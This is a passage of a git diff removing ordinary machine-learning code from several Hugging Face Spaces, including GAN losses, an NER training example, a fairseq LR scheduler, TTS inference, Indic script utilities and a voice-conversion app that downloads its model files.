= d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -def feature_loss(fmap_r, fmap_g): - loss = 0 - for dr, dg in zip(fmap_r, fmap_g): - for rl, gl in zip(dr, dg): - loss += torch.mean(torch.abs(rl - gl)) - - return loss * 2 - - -def discriminator_loss(disc_real_outputs, disc_generated_outputs): - loss = 0 - r_losses = [] - g_losses = [] - for dr, dg in zip(disc_real_outputs, disc_generated_outputs): - r_loss = torch.mean((1 - dr) ** 2) - g_loss = torch.mean(dg ** 2) - loss += (r_loss + g_loss) - r_losses.append(r_loss.item()) - g_losses.append(g_loss.item()) - - return loss, r_losses, g_losses - - -def generator_loss(disc_outputs): - loss = 0 - gen_losses = [] - for dg in disc_outputs: - l = torch.mean((1 - dg) ** 2) - gen_losses.append(l) - loss += l - - return loss, gen_losses diff --git a/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py b/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py deleted file mode 100644 index a36f649ce85404ce36be47f639d675aa88faeaf2..0000000000000000000000000000000000000000 --- a/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py +++ /dev/null @@ -1,95 +0,0 @@ -import argparse -from fengshen import UbertPiplines -import os -os.environ["CUDA_VISIBLE_DEVICES"] = '6' - - -def main(): - total_parser = argparse.ArgumentParser("TASK NAME") - total_parser = UbertPiplines.piplines_args(total_parser) - args = total_parser.parse_args() - - # set some parameters used for training - args.pretrained_model_path = 'IDEA-CCNL/Erlangshen-Ubert-110M-Chinese' # path of the pretrained model; the pretrained models we provide are hosted on HuggingFace - args.default_root_dir = './' # default root dir, used for logs, tensorboard, etc. - args.max_epochs = 5 - args.gpus = 1 - args.batch_size = 1 - - # just process your data into the JSON format below for one-click training and prediction; only one example sample is provided below - train_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "彭小军认为，国内银行现在走的是台湾的发卡模式，先通过跑马圈地再在圈的地里面选择客户，", - "choices": [ - {"entity_type": "地址", 
"label": 0, "entity_list": [ - {"entity_name": "台湾", "entity_type": "地址", "entity_idx": [[15, 16]]}]}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - {"entity_type": "公司", "label": 0, "entity_list": []}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": [ - {"entity_name": "彭小军", "entity_type": "人物姓名", "entity_idx": [[0, 2]]}]}, - {"entity_type": "组织机构", "label": 0, "entity_list": []}, - {"entity_type": "岗位职位", "label": 0, "entity_list": []}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - "id": 0} - ] - dev_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "就天涯网推出彩票服务频道是否是业内人士所谓的打政策“擦边球”,记者近日对此事求证彩票监管部门。", - "choices": [ - {"entity_type": "地址", "label": 0, "entity_list": []}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - {"entity_type": "公司", "label": 0, "entity_list": [ - {"entity_name": "天涯网", "entity_type": "公司", "entity_idx": [[1, 3]]}]}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": []}, - {"entity_type": "组织机构", "label": 0, "entity_list": [ - {"entity_name": "彩票监管部门", "entity_type": "组织机构", "entity_idx": [[40, 45]]}]}, - {"entity_type": "岗位职位", "label": 0, "entity_list": [ - {"entity_name": "记者", "entity_type": "岗位职位", "entity_idx": [[31, 32]]}]}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - - "id": 0} - - ] - test_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "这也让很多业主据此认为,雅清苑是政府公务员挤对了国家的经适房政策。", - "choices": [ - {"entity_type": "地址", "label": 0, "entity_list": [ - {"entity_name": "雅清苑", "entity_type": "地址", "entity_idx": [[12, 14]]}]}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - 
{"entity_type": "公司", "label": 0, "entity_list": []}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": []}, - {"entity_type": "组织机构", "label": 0, "entity_list": []}, - {"entity_type": "岗位职位", "label": 0, "entity_list": [ - {"entity_name": "公务员", "entity_type": "岗位职位", "entity_idx": [[18, 20]]}]}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - "id": 0}, - ] - - model = UbertPiplines(args) - model.fit(train_data, dev_data) - result = model.predict(test_data) - for line in result: - print(line) - - -if __name__ == "__main__": - main() diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py deleted file mode 100644 index bfe2a0d381f28525f90ee120b31a69210338eb1b..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py +++ /dev/null @@ -1,83 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import math -from dataclasses import dataclass, field -from typing import List - -from omegaconf import II - -from fairseq.dataclass import FairseqDataclass -from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler - - -@dataclass -class TriangularLRScheduleConfig(FairseqDataclass): - max_lr: float = field( - default="???", metadata={"help": "max learning rate, must be more than cfg.lr"} - ) - lr_period_updates: float = field( - default=5000, - metadata={"help": "initial number of updates per period (cycle length)"}, - ) - lr_shrink: float = field( - default=0.1, metadata={"help": "shrink factor for annealing"} - ) - shrink_min: bool = field( - default=False, metadata={"help": "if set, also shrinks min lr"} - ) - lr: List[float] = II("optimization.lr") - - -@register_lr_scheduler("triangular", dataclass=TriangularLRScheduleConfig) -class TriangularLRSchedule(FairseqLRScheduler): - """Assign LR based on a triangular cyclical schedule. - - See https://arxiv.org/pdf/1506.01186.pdf for details. - """ - - def __init__(self, cfg: TriangularLRScheduleConfig, optimizer): - super().__init__(cfg, optimizer) - if len(cfg.lr) > 1: - raise ValueError( - "Cannot use a fixed learning rate schedule with triangular." - " Consider --lr-scheduler=fixed instead." 
- ) - - lr = cfg.lr[0] - - assert cfg.max_lr > lr, "max_lr must be more than lr" - self.min_lr = lr - self.max_lr = cfg.max_lr - self.stepsize = cfg.lr_period_updates // 2 - self.lr_shrink = cfg.lr_shrink - self.shrink_min = cfg.shrink_min - - # initial learning rate - self.lr = self.min_lr - self.optimizer.set_lr(self.lr) - - def step(self, epoch, val_loss=None): - """Update the learning rate at the end of the given epoch.""" - super().step(epoch, val_loss) - # we don't change the learning rate at epoch boundaries - return self.optimizer.get_lr() - - def step_update(self, num_updates): - """Update the learning rate after each update.""" - cycle = math.floor(num_updates / (2 * self.stepsize)) - - lr_shrink = self.lr_shrink ** cycle - max_lr = self.max_lr * lr_shrink - if self.shrink_min: - min_lr = self.min_lr * lr_shrink - else: - min_lr = self.min_lr - - x = abs(num_updates / self.stepsize - 2 * (cycle + 1) + 1) - self.lr = min_lr + (max_lr - min_lr) * max(0, (1 - x)) - - self.optimizer.set_lr(self.lr) - return self.lr diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh deleted file mode 100644 index c10bf2b76ea032deabab6f5c9d8a3e1e884f1642..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash - -if [ $# -ne 4 ]; then - echo "usage: $0 TESTSET SRCLANG TGTLANG GEN" - exit 1 -fi - -TESTSET=$1 -SRCLANG=$2 -TGTLANG=$3 - -GEN=$4 - -if ! 
command -v sacremoses &> /dev/null -then - echo "sacremoses could not be found, please install with: pip install sacremoses" - exit -fi - -grep ^H $GEN \ -| sed 's/^H\-//' \ -| sort -n -k 1 \ -| cut -f 3 \ -| sacremoses detokenize \ -> $GEN.sorted.detok - -sacrebleu --test-set $TESTSET --language-pair "${SRCLANG}-${TGTLANG}" < $GEN.sorted.detok diff --git a/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py b/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py deleted file mode 100644 index b373de8d62ce4aeb6ba5db5a07e8b018c347217b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py +++ /dev/null @@ -1,158 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals -from typing import Tuple -import sys -from argparse import ArgumentParser - -import torch -import numpy as np -import os -import json -import torch - -sys.path.append(os.path.join(os.path.dirname(__file__), "../src/glow_tts")) - -from scipy.io.wavfile import write -from hifi.env import AttrDict -from hifi.models import Generator - - -from text import text_to_sequence -import commons -import models -import utils - - -def check_directory(dir): - if not os.path.exists(dir): - sys.exit("Error: {} directory does not exist".format(dir)) - - -class TextToMel: - def __init__(self, glow_model_dir, device="cuda"): - self.glow_model_dir = glow_model_dir - check_directory(self.glow_model_dir) - self.device = device - self.hps, self.glow_tts_model = self.load_glow_tts() - pass - - def load_glow_tts(self): - hps = utils.get_hparams_from_dir(self.glow_model_dir) - checkpoint_path = utils.latest_checkpoint_path(self.glow_model_dir) - symbols = list(hps.data.punc) + list(hps.data.chars) - glow_tts_model = models.FlowGenerator( - len(symbols) + getattr(hps.data, "add_blank", False), - out_channels=hps.data.n_mel_channels, - **hps.model - ) # .to(self.device) - - if self.device == "cuda": - 
glow_tts_model.to("cuda") - - utils.load_checkpoint(checkpoint_path, glow_tts_model) - glow_tts_model.decoder.store_inverse() - _ = glow_tts_model.eval() - - return hps, glow_tts_model - - def generate_mel(self, text, noise_scale=0.667, length_scale=1.0): - symbols = list(self.hps.data.punc) + list(self.hps.data.chars) - cleaner = self.hps.data.text_cleaners - if getattr(self.hps.data, "add_blank", False): - text_norm = text_to_sequence(text, symbols, cleaner) - text_norm = commons.intersperse(text_norm, len(symbols)) - else: # If not using "add_blank" option during training, adding spaces at the beginning and the end of utterance improves quality - text = " " + text.strip() + " " - text_norm = text_to_sequence(text, symbols, cleaner) - - sequence = np.array(text_norm)[None, :] - - del symbols - del cleaner - del text - del text_norm - - if self.device == "cuda": - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]).cuda() - else: - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]) - - with torch.no_grad(): - (y_gen_tst, *_), *_, (attn_gen, *_) = self.glow_tts_model( - x_tst, - x_tst_lengths, - gen=True, - noise_scale=noise_scale, - length_scale=length_scale, - ) - del x_tst - del x_tst_lengths - torch.cuda.empty_cache() - return y_gen_tst - #return y_gen_tst.cpu().detach().numpy() - - -class MelToWav: - def __init__(self, hifi_model_dir, device="cuda"): - self.hifi_model_dir = hifi_model_dir - check_directory(self.hifi_model_dir) - self.device = device - self.h, self.hifi_gan_generator = self.load_hifi_gan() - pass - - def load_hifi_gan(self): - checkpoint_path = utils.latest_checkpoint_path(self.hifi_model_dir, regex="g_*") - config_file = os.path.join(self.hifi_model_dir, "config.json") - data = open(config_file).read() - json_config = json.loads(data) - h = AttrDict(json_config) - torch.manual_seed(h.seed) - - generator = 
Generator(h).to(self.device) - - assert os.path.isfile(checkpoint_path) - print("Loading '{}'".format(checkpoint_path)) - state_dict_g = torch.load(checkpoint_path, map_location=self.device) - print("Complete.") - - generator.load_state_dict(state_dict_g["generator"]) - - generator.eval() - generator.remove_weight_norm() - - return h, generator - - def generate_wav(self, mel): - #mel = torch.FloatTensor(mel).to(self.device) - - y_g_hat = self.hifi_gan_generator(mel.to(self.device)) # passing through vocoder - audio = y_g_hat.squeeze() - audio = audio * 32768.0 - audio = audio.cpu().detach().numpy().astype("int16") - - del y_g_hat - del mel - torch.cuda.empty_cache() - return audio, self.h.sampling_rate - - -if __name__ == "__main__": - - parser = ArgumentParser() - parser.add_argument("-m", "--model", required=True, type=str) - parser.add_argument("-g", "--gan", required=True, type=str) - parser.add_argument("-d", "--device", type=str, default="cpu") - parser.add_argument("-t", "--text", type=str, required=True) - parser.add_argument("-w", "--wav", type=str, required=True) - args = parser.parse_args() - - text_to_mel = TextToMel(glow_model_dir=args.model, device=args.device) - mel_to_wav = MelToWav(hifi_model_dir=args.gan, device=args.device) - - mel = text_to_mel.generate_mel(args.text) - audio, sr = mel_to_wav.generate_wav(mel) - - write(filename=args.wav, rate=sr, data=audio) - - pass diff --git a/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py b/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py deleted file mode 100644 index efb7e372feeb67d7106eb5c443de2e14053fd204..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py +++ /dev/null @@ -1,488 +0,0 @@ -# -# Copyright (c) 2013-present, Anoop Kunchukuttan -# All rights reserved. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
-# - -## language codes -LC_TA='ta' - -SCRIPT_RANGES={ - 'pa':[0x0a00,0x0a7f] , - 'gu':[0x0a80,0x0aff] , - 'or':[0x0b00,0x0b7f] , - 'ta':[0x0b80,0x0bff] , - 'te':[0x0c00,0x0c7f] , - 'kn':[0x0c80,0x0cff] , - 'ml':[0x0d00,0x0d7f] , - 'si':[0x0d80,0x0dff] , - 'hi':[0x0900,0x097f] , - 'mr':[0x0900,0x097f] , - 'kK':[0x0900,0x097f] , - 'sa':[0x0900,0x097f] , - 'ne':[0x0900,0x097f] , - 'sd':[0x0900,0x097f] , - 'bn':[0x0980,0x09ff] , - 'as':[0x0980,0x09ff] , - } - -DRAVIDIAN_LANGUAGES=['ta', 'te', 'kn', 'ml',] -IE_LANGUAGES=['hi', 'mr', 'kK', 'sa', 'ne', 'sd', 'bn', 'as', 'pa', 'gu', 'or', 'si', ] -DANDA_DELIM_LANGUAGES=['as','bn','hi','ne','or','pa','sa','sd'] - -URDU_RANGES=[ - [0x0600,0x06ff], - [0x0750,0x077f], - [0xfb50,0xfdff], - [0xfe70,0xfeff], - ] - -COORDINATED_RANGE_START_INCLUSIVE=0 -COORDINATED_RANGE_END_INCLUSIVE=0x6f - -NUMERIC_OFFSET_START=0x66 -NUMERIC_OFFSET_END=0x6f - -HALANTA_OFFSET=0x4d -AUM_OFFSET=0x50 -NUKTA_OFFSET=0x3c - -RUPEE_SIGN=0x20b9 - -DANDA=0x0964 -DOUBLE_DANDA=0x0965 - -#TODO: add missing fricatives and approximants -VELAR_RANGE=[0x15,0x19] -PALATAL_RANGE=[0x1a,0x1e] -RETROFLEX_RANGE=[0x1f,0x23] -DENTAL_RANGE=[0x24,0x29] -LABIAL_RANGE=[0x2a,0x2e] - -# verify -VOICED_LIST=[0x17,0x18,0x1c,0x1d,0x21,0x22,0x26,0x27,0x2c,0x2d] -UNVOICED_LIST=[0x15,0x16,0x1a,0x1b,0x1f,0x20,0x24,0x25,0x2a,0x2b] #TODO: add sibilants/sonorants -ASPIRATED_LIST=[0x16,0x18,0x1b,0x1d,0x20,0x22,0x25,0x27,0x2b,0x2d] -UNASPIRATED_LIST=[0x15,0x17,0x1a,0x1c,0x1f,0x21,0x24,0x26,0x2a,0x2c] -NASAL_LIST=[0x19,0x1e,0x23,0x28,0x29,0x2d] -FRICATIVE_LIST=[0x36,0x37,0x38] -APPROXIMANT_LIST=[0x2f,0x30,0x31,0x32,0x33,0x34,0x35] - -#TODO: ha has to be properly categorized - -def is_danda_delim(lang): - """ - Returns True if danda/double danda is a possible delimiter for the language - """ - return lang in DANDA_DELIM_LANGUAGES - -def get_offset(c,lang): - """ - Applicable to Brahmi derived Indic scripts - """ - return ord(c)-SCRIPT_RANGES[lang][0] - -def offset_to_char(c,lang): - """ - 
Applicable to Brahmi derived Indic scripts - """ - return chr(c+SCRIPT_RANGES[lang][0]) - -def in_coordinated_range(c_offset): - """ - Applicable to Brahmi derived Indic scripts - """ - return (c_offset>=COORDINATED_RANGE_START_INCLUSIVE and c_offset<=COORDINATED_RANGE_END_INCLUSIVE) - -def is_indiclang_char(c,lang): - """ - Applicable to Brahmi derived Indic scripts - """ - o=get_offset(c,lang) - return (o>=0 and o<=0x7f) or ord(c)==DANDA or ord(c)==DOUBLE_DANDA - -# def is_vowel(c,lang): -# """ -# Is the character a vowel -# """ -# o=get_offset(c,lang) -# return (o>=0x04 and o<=0x14) - -# def is_vowel_sign(c,lang): -# """ -# Is the character a vowel sign (maatraa) -# """ -# o=get_offset(c,lang) -# return (o>=0x3e and o<=0x4c) - -# def is_halanta(c,lang): -# """ -# Is the character the halanta character -# """ -# o=get_offset(c,lang) -# return (o==HALANTA_OFFSET) - -# def is_nukta(c,lang): -# """ -# Is the character the halanta character -# """ -# o=get_offset(c,lang) -# return (o==NUKTA_OFFSET) - -# def is_aum(c,lang): -# """ -# Is the character a vowel sign (maatraa) -# """ -# o=get_offset(c,lang) -# return (o==AUM_OFFSET) - -# def is_consonant(c,lang): -# """ -# Is the character a consonant -# """ -# o=get_offset(c,lang) -# return (o>=0x15 and o<=0x39) - -# def is_velar(c,lang): -# """ -# Is the character a velar -# """ -# o=get_offset(c,lang) -# return (o>=VELAR_RANGE[0] and o<=VELAR_RANGE[1]) - -# def is_palatal(c,lang): -# """ -# Is the character a palatal -# """ -# o=get_offset(c,lang) -# return (o>=PALATAL_RANGE[0] and o<=PALATAL_RANGE[1]) - -# def is_retroflex(c,lang): -# """ -# Is the character a retroflex -# """ -# o=get_offset(c,lang) -# return (o>=RETROFLEX_RANGE[0] and o<=RETROFLEX_RANGE[1]) - -# def is_dental(c,lang): -# """ -# Is the character a dental -# """ -# o=get_offset(c,lang) -# return (o>=DENTAL_RANGE[0] and o<=DENTAL_RANGE[1]) - -# def is_labial(c,lang): -# """ -# Is the character a labial -# """ -# o=get_offset(c,lang) -# return 
(o>=LABIAL_RANGE[0] and o<=LABIAL_RANGE[1]) - -# def is_voiced(c,lang): -# """ -# Is the character a voiced consonant -# """ -# o=get_offset(c,lang) -# return o in VOICED_LIST - -# def is_unvoiced(c,lang): -# """ -# Is the character a unvoiced consonant -# """ -# o=get_offset(c,lang) -# return o in UNVOICED_LIST - -# def is_aspirated(c,lang): -# """ -# Is the character a aspirated consonant -# """ -# o=get_offset(c,lang) -# return o in ASPIRATED_LIST - -# def is_unaspirated(c,lang): -# """ -# Is the character a unaspirated consonant -# """ -# o=get_offset(c,lang) -# return o in UNASPIRATED_LIST - -# def is_nasal(c,lang): -# """ -# Is the character a nasal consonant -# """ -# o=get_offset(c,lang) -# return o in NASAL_LIST - -# def is_fricative(c,lang): -# """ -# Is the character a fricative consonant -# """ -# o=get_offset(c,lang) -# return o in FRICATIVE_LIST - -# def is_approximant(c,lang): -# """ -# Is the character an approximant consonant -# """ -# o=get_offset(c,lang) -# return o in APPROXIMANT_LIST - -# def is_number(c,lang): -# """ -# Is the character a number -# """ -# o=get_offset(c,lang) -# return (o>=0x66 and o<=0x6f) - - -def is_vowel(c,lang): - """ - Is the character a vowel - """ - o=get_offset(c,lang) - return (o>=0x04 and o<=0x14) - -def is_vowel_sign(c,lang): - """ - Is the character a vowel sign (maatraa) - """ - o=get_offset(c,lang) - return (o>=0x3e and o<=0x4c) - -def is_halanta(c,lang): - """ - Is the character the halanta character - """ - o=get_offset(c,lang) - return (o==HALANTA_OFFSET) - -def is_nukta(c,lang): - """ - Is the character the halanta character - """ - o=get_offset(c,lang) - return (o==NUKTA_OFFSET) - -def is_aum(c,lang): - """ - Is the character a vowel sign (maatraa) - """ - o=get_offset(c,lang) - return (o==AUM_OFFSET) - -def is_consonant(c,lang): - """ - Is the character a consonant - """ - o=get_offset(c,lang) - return (o>=0x15 and o<=0x39) - -def is_velar(c,lang): - """ - Is the character a velar - """ - 
o=get_offset(c,lang) - return (o>=VELAR_RANGE[0] and o<=VELAR_RANGE[1]) - -def is_palatal(c,lang): - """ - Is the character a palatal - """ - o=get_offset(c,lang) - return (o>=PALATAL_RANGE[0] and o<=PALATAL_RANGE[1]) - -def is_retroflex(c,lang): - """ - Is the character a retroflex - """ - o=get_offset(c,lang) - return (o>=RETROFLEX_RANGE[0] and o<=RETROFLEX_RANGE[1]) - -def is_dental(c,lang): - """ - Is the character a dental - """ - o=get_offset(c,lang) - return (o>=DENTAL_RANGE[0] and o<=DENTAL_RANGE[1]) - -def is_labial(c,lang): - """ - Is the character a labial - """ - o=get_offset(c,lang) - return (o>=LABIAL_RANGE[0] and o<=LABIAL_RANGE[1]) - -def is_voiced(c,lang): - """ - Is the character a voiced consonant - """ - o=get_offset(c,lang) - return o in VOICED_LIST - -def is_unvoiced(c,lang): - """ - Is the character a unvoiced consonant - """ - o=get_offset(c,lang) - return o in UNVOICED_LIST - -def is_aspirated(c,lang): - """ - Is the character a aspirated consonant - """ - o=get_offset(c,lang) - return o in ASPIRATED_LIST - -def is_unaspirated(c,lang): - """ - Is the character a unaspirated consonant - """ - o=get_offset(c,lang) - return o in UNASPIRATED_LIST - -def is_nasal(c,lang): - """ - Is the character a nasal consonant - """ - o=get_offset(c,lang) - return o in NASAL_LIST - -def is_fricative(c,lang): - """ - Is the character a fricative consonant - """ - o=get_offset(c,lang) - return o in FRICATIVE_LIST - -def is_approximant(c,lang): - """ - Is the character an approximant consonant - """ - o=get_offset(c,lang) - return o in APPROXIMANT_LIST - -def is_number(c,lang): - """ - Is the character a number - """ - o=get_offset(c,lang) - return (o>=0x66 and o<=0x6f) - - -################################################## - -def is_vowel_offset(c_offset): - """ - Is the offset a vowel - """ - return (c_offset>=0x04 and c_offset<=0x14) - -def is_vowel_sign_offset(c_offset): - """ - Is the offset a vowel sign (maatraa) - """ - return (c_offset>=0x3e and 
c_offset<=0x4c) - -def is_halanta_offset(c_offset): - """ - Is the offset the halanta offset - """ - return (c_offset==HALANTA_OFFSET) - -def is_nukta_offset(c_offset): - """ - Is the offset the halanta offset - """ - return (c_offset==NUKTA_OFFSET) - -def is_aum_offset(c_offset): - """ - Is the offset a vowel sign (maatraa) - """ - return (c_offset==AUM_OFFSET) - -def is_consonant_offset(c_offset): - """ - Is the offset a consonant - """ - return (c_offset>=0x15 and c_offset<=0x39) - -def is_velar_offset(c_offset): - """ - Is the offset a velar - """ - return (c_offset>=VELAR_RANGE[0] and c_offset<=VELAR_RANGE[1]) - -def is_palatal_offset(c_offset): - """ - Is the offset a palatal - """ - return (c_offset>=PALATAL_RANGE[0] and c_offset<=PALATAL_RANGE[1]) - -def is_retroflex_offset(c_offset): - """ - Is the offset a retroflex - """ - return (c_offset>=RETROFLEX_RANGE[0] and c_offset<=RETROFLEX_RANGE[1]) - -def is_dental_offset(c_offset): - """ - Is the offset a dental - """ - return (c_offset>=DENTAL_RANGE[0] and c_offset<=DENTAL_RANGE[1]) - -def is_labial_offset(c_offset): - """ - Is the offset a labial - """ - return (c_offset>=LABIAL_RANGE[0] and c_offset<=LABIAL_RANGE[1]) - -def is_voiced_offset(c_offset): - """ - Is the offset a voiced consonant - """ - return c_offset in VOICED_LIST - -def is_unvoiced_offset(c_offset): - """ - Is the offset a unvoiced consonant - """ - return c_offset in UNVOICED_LIST - -def is_aspirated_offset(c_offset): - """ - Is the offset a aspirated consonant - """ - return c_offset in ASPIRATED_LIST - -def is_unaspirated_offset(c_offset): - """ - Is the offset a unaspirated consonant - """ - return c_offset in UNASPIRATED_LIST - -def is_nasal_offset(c_offset): - """ - Is the offset a nasal consonant - """ - return c_offset in NASAL_LIST - -def is_fricative_offset(c_offset): - """ - Is the offset a fricative consonant - """ - return c_offset in FRICATIVE_LIST - -def is_approximant_offset(c_offset): - """ - Is the offset an approximant 
consonant - """ - return c_offset in APPROXIMANT_LIST - -def is_number_offset(c_offset): - """ - Is the offset a number - """ - return (c_offset>=0x66 and c_offset<=0x6f) diff --git a/spaces/Hexamind/GDOC/src/view/test_view.py b/spaces/Hexamind/GDOC/src/view/test_view.py deleted file mode 100644 index cb845ba4c6f6ef2bd66c3e988014808155e1ef45..0000000000000000000000000000000000000000 --- a/spaces/Hexamind/GDOC/src/view/test_view.py +++ /dev/null @@ -1,35 +0,0 @@ -import gradio as gr -import random - -with gr.Blocks() as test: - list_2 = ["choix21", "choix 22", "et choix 23"] - with gr.Row(): - with gr.Accordion("See Details") as grac: - gr.Markdown("lorem ipsum") - hide_btn = gr.Button("hide") - show_btn = gr.Button("show") - - def hide_fn(): - update_ = { - grac: gr.update(open=False) - } - return update_ - - def show_fn(): - update_ = { - grac: gr.update(open=True) - } - return update_ - - hide_btn.click(hide_fn, - inputs=[], - outputs=[grac]) - show_btn.click(show_fn, - inputs=[], - outputs=[grac]) - - - - -if __name__ == "__main__": - test.launch() diff --git a/spaces/HighCWu/starganv2vc-paddle/app.py b/spaces/HighCWu/starganv2vc-paddle/app.py deleted file mode 100644 index 1cc88dbf959a5f1912c853717bceaff00a0b1adf..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/starganv2vc-paddle/app.py +++ /dev/null @@ -1,151 +0,0 @@ -import os -os.system("pip install gradio==2.9b24") - -import gradio as gr - - -vocoder_url = 'https://bj.bcebos.com/v1/ai-studio-online/e46d52315a504f1fa520528582a8422b6fa7006463844b84b8a2c3d21cc314db?/Vocoder.zip' -models_url = 'https://bj.bcebos.com/v1/ai-studio-online/6c081f29caad483ebd4cded087ee6ddbfc8dca8fb89d4ab69d44253ce5525e32?/Models.zip' - -from io import BytesIO -from zipfile import ZipFile -from urllib.request import urlopen - - -if not (os.path.isdir('Vocoder') and os.path.isdir('Models')): - for url in [vocoder_url, models_url]: - resp = urlopen(url) - zipfile = ZipFile(BytesIO(resp.read())) - zipfile.extractall() - - 
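
The block above fetches the `Vocoder` and `Models` archives with `urlopen` and unpacks them via an in-memory `BytesIO` + `ZipFile`. That extraction path can be exercised offline with a locally built archive instead of a network fetch — a minimal sketch (the archive contents here are hypothetical stand-ins, not the real model files):

```python
import io
import tempfile
import zipfile

# Offline sketch of the BytesIO + ZipFile pattern used by the download
# block: the archive is built in memory rather than fetched over the
# network, so the extraction logic can be tested without any downloads.
def extract_in_memory(zip_bytes: bytes, dest: str) -> list:
    """Extract a zip held in memory and return its member names."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()

# Build a tiny stand-in archive (hypothetical contents).
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("Models/config.yml", "model_params: {}\n")

with tempfile.TemporaryDirectory() as tmp:
    names = extract_in_memory(buf.getvalue(), tmp)
```

The same `extract_in_memory` helper would accept `resp.read()` from `urlopen` unchanged, which is what the script above does inline.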
-import random -import yaml -from munch import Munch -import numpy as np -import paddle -from paddle import nn -import paddle.nn.functional as F -import paddleaudio -import librosa - -from starganv2vc_paddle.Utils.JDC.model import JDCNet -from starganv2vc_paddle.models import Generator, MappingNetwork, StyleEncoder - - -speakers = [225,228,229,230,231,233,236,239,240,244,226,227,232,243,254,256,258,259,270,273] - -to_mel = paddleaudio.features.MelSpectrogram( - n_mels=80, n_fft=2048, win_length=1200, hop_length=300) -to_mel.fbank_matrix[:] = paddle.load('starganv2vc_paddle/fbank_matrix.pd')['fbank_matrix'] -mean, std = -4, 4 - -def preprocess(wave): - wave_tensor = paddle.to_tensor(wave).astype(paddle.float32) - mel_tensor = to_mel(wave_tensor) - mel_tensor = (paddle.log(1e-5 + mel_tensor.unsqueeze(0)) - mean) / std - return mel_tensor - -def build_model(model_params={}): - args = Munch(model_params) - generator = Generator(args.dim_in, args.style_dim, args.max_conv_dim, w_hpf=args.w_hpf, F0_channel=args.F0_channel) - mapping_network = MappingNetwork(args.latent_dim, args.style_dim, args.num_domains, hidden_dim=args.max_conv_dim) - style_encoder = StyleEncoder(args.dim_in, args.style_dim, args.num_domains, args.max_conv_dim) - - nets_ema = Munch(generator=generator, - mapping_network=mapping_network, - style_encoder=style_encoder) - - return nets_ema - -def compute_style(speaker_dicts): - reference_embeddings = {} - for key, (path, speaker) in speaker_dicts.items(): - if path == "": - label = paddle.to_tensor([speaker], dtype=paddle.int64) - latent_dim = starganv2.mapping_network.shared[0].weight.shape[0] - ref = starganv2.mapping_network(paddle.randn([1, latent_dim]), label) - else: - wave, sr = librosa.load(path, sr=24000) - audio, index = librosa.effects.trim(wave, top_db=30) - if sr != 24000: - wave = librosa.resample(wave, sr, 24000) - mel_tensor = preprocess(wave) - - with paddle.no_grad(): - label = paddle.to_tensor([speaker], dtype=paddle.int64) - ref = 
